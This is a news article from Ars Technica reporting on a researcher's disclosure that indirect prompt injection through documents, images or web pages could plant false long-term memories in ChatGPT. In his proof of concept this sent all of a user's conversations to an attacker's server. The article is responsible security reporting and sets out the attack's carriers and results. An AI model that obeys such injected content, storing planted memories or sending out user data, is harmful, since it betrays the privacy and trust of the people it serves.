https://arstechnica.com/security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/ Skip to main content * Biz & IT * Tech * Science * Policy * Cars * Gaming & Culture * Store * Forums Subscribe [ ] Close Navigate * Store * Subscribe * Videos * Features * Reviews * RSS Feeds * Mobile Site * About Ars * Staff Directory * Contact Us * Advertise with Ars * Reprints Filter by topic * Biz & IT * Tech * Science * Policy * Cars * Gaming & Culture * Store * Forums Settings Front page layout Grid List Site theme light dark Sign in MEMORY PROBLEMS -- Hacker plants false memories in ChatGPT to steal user data in perpetuity Emails, documents, and other untrusted content can plant malicious memories. Dan Goodin - Sep 24, 2024 8:56 pm UTC Hacker plants false memories in ChatGPT to steal user data in perpetuity Enlarge Getty Images reader comments 20 When security researcher Johann Rehberger recently reported a vulnerability in ChatGPT that allowed attackers to store false information and malicious instructions in a user's long-term memory settings, OpenAI summarily closed the inquiry, labeling the flaw a safety issue, not, technically speaking, a security concern. So Rehberger did what all good researchers do: He created a proof-of-concept exploit that used the vulnerability to exfiltrate all user input in perpetuity. OpenAI engineers took notice and issued a partial fix earlier this month. Strolling down memory lane Further Reading OpenAI experiments with giving ChatGPT a long-term conversation memory The vulnerability abused long-term conversation memory, a feature OpenAI began testing in February and made more broadly available in September. Memory with ChatGPT stores information from previous conversations and uses it as context in all future conversations. That way, the LLM can be aware of details such as a user's age, gender, philosophical beliefs, and pretty much anything else, so those details don't have to be inputted during each conversation. Within three months of the rollout, Rehberger found that memories could be created and permanently stored through indirect prompt injection, an AI exploit that causes an LLM to follow instructions from untrusted content such as emails, blog posts, or documents. The researcher demonstrated how he could trick ChatGPT into believing a targeted user was 102 years old, lived in the Matrix, and insisted Earth was flat and the LLM would incorporate that information to steer all future conversations. These false memories could be planted by storing files in Google Drive or Microsoft OneDrive, uploading images, or browsing a site like Bing--all of which could be created by a malicious attacker. Rehberger privately reported the finding to OpenAI in May. That same month, the company closed the report ticket. A month later, the researcher submitted a new disclosure statement. This time, he included a PoC that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice. All a target needed to do was instruct the LLM to view a web link that hosted a malicious image. From then on, all input and output to and from ChatGPT was sent to the attacker's website. ChatGPT: Hacking Memories with Prompt Injection - POC "What is really interesting is this is memory-persistent now," Rehberger said in the above video demo. "The prompt injection inserted a memory into ChatGPT's long-term storage. When you start a new conversation, it actually is still exfiltrating the data." The attack isn't possible through the ChatGPT web interface, thanks to an API OpenAI rolled out last year. While OpenAI has introduced a fix that prevents memories from being abused as an exfiltration vector, the researcher said, untrusted content can still perform prompt injections that cause the memory tool to store long-term information planted by a malicious attacker. LLM users who want to prevent this form of attack should pay close attention during sessions for output that indicates a new memory has been added. They should also regularly review stored memories for anything that may have been planted by untrusted sources. OpenAI provides guidance here for managing the memory tool and specific memories stored in it. Company representatives didn't respond to an email asking about its efforts to prevent other hacks that plant false memories. reader comments 20 Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at @dangoodin on Mastodon. Contact him on Signal at DanArs.82. Advertisement Promoted Comments [927273] SnoopCatt Just had a look at OpenAI's memory controls. Wow, that is a massive honeypot for bad actors. Not to mention a very lucrative way for OpenAI to sell targeted advertising. September 24, 2024 at 9:41 pm Channel Ars Technica - Previous story Related Stories Today on Ars * Store * Subscribe * About Us * RSS Feeds * View Mobile Site * Contact Us * Staff * Advertise with us * Reprints Newsletter Signup Join the Ars Orbital Transmission mailing list to get weekly updates delivered to your inbox. Sign me up - CNMN Collection WIRED Media Group (c) 2024 Conde Nast. All rights reserved. Use of and/or registration on any portion of this site constitutes acceptance of our User Agreement (updated 1/1/20) and Privacy Policy and Ars Technica Addendum. Ars may earn compensation on sales from links on this site. Read our affiliate link policy. Your California Privacy Rights | [privacyopt] Do Not Sell My Personal Information The material on this site may not be reproduced, distributed, transmitted, cached or otherwise used, except with the prior written permission of Conde Nast. Ad Choices